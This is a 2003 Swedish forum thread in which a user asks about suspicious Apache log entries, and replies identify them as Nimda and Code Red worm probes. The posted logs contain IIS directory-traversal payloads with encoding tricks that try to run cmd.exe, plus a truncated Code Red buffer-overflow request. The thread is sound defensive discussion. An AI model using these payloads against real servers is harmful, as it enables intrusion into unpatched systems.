Permalänk
Medlem

Är detta ett intrångs försök?

Detta hittade jag i min apache log fil är det ett intrångs försök?

[23/May/2003:10:49:25 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
[23/May/2003:10:49:26 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
[23/May/2003:10:49:26 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
[23/May/2003:10:49:26 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
[23/May/2003:10:49:26 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
[23/May/2003:10:49:27 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
[23/May/2003:10:49:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
[23/May/2003:10:49:27 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:27 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:28 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
[23/May/2003:10:49:28 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
[23/May/2003:10:49:28 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
[23/May/2003:10:49:28 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
[23/May/2003:10:49:28 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

Visa signatur

Brommsen dödar farten.

Permalänk
Medlem
Permalänk
Medlem

Ser väl mest ut som någon mask..

Men jo det är nog ett intrångsförsök.

Visa signatur

[size="1"]Den åttonde dvärgen
Zwei dinge sind unendlich, die dumheit und das all.
Jag har makten, här i trakten. Jag leker gud.[/size]

Permalänk
Medlem

Grrr..!

Jag har exakt samma sak på min apache log....men det e nog inget och va rädd för. Det är ganska svårt och komma åt winnt/system32/cmd.exe i Linux

Visa signatur

E-penis:
i9 9900k @ 5hz | Aorus Master Z390 | 2x16GB Corsair 3200 LPX | ASUS ROG STRIX GeForce RTX 3080 10GB | Phateks Evolv X | EVGA SuperNOVA G2 750W | Corsair H115i PRO | 6TB HDD | Asus MG279Q 27" | Asus Claymore Core | Logitech G403/G35 | Windows 10 Pro x64

Permalänk
Medlem

Någon som vet vad det är för slags mask?

Visa signatur

Brommsen dödar farten.

Permalänk
Medlem

code red eller nimda.

Visa signatur

Hej

Permalänk
Medlem

Nimda.

Code Red har en ända lång request. Nimda har flera korta. syns tydlig skillnad.
Om du inte kör windows med IIS så behöver du inte orora dig.

edit: såhär ser code red ut:

213.114.*.*- - [07/May/2003:19:57:33 +0200] "GET /default.ida?XXXXXX|: *klipp* :|XXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 283

Visa signatur

Har du nhGPS? kolla detta.
Fotograferar lite ibland när jag har tid. Annars jobbar jag som fotograf.

Permalänk
Inaktiv

Finns det någon bra sida där man har samlat och visar hur olika server logs ser ut när olika script och hackers försök med nått så man kan se vad man har drabbats av?

Permalänk
Medlem

Så länge man patchar programvaran så är det lungt, men japp det e en mask. Just när dom där kom ut så såg statestiken rolig ut på dom flesta servrarna i världen
Men Det är inget du kan bry dig om, personen som skickar är nog inte medveten om säkerhetshålet och gör det altså inte medvetet. Däremot så bör du vara orolig om du har IIS eller va windows webserver heter och ej patchat den på senare tid.

Visa signatur

"Don't you worry, i'm a gamm-M.U.C.K.:ad signalmekaniker."
AMD Athlon 64 3200+ 1024mb ram PC3200, GF6800GT 128Mb, ~800Gb (Dumma D70 som slukar HDD >.<) Hdd SB Audigy2 platinum
Atmel ATmega8515 @ 4mhz, 5v core. Har full koll på 8 LED iallafall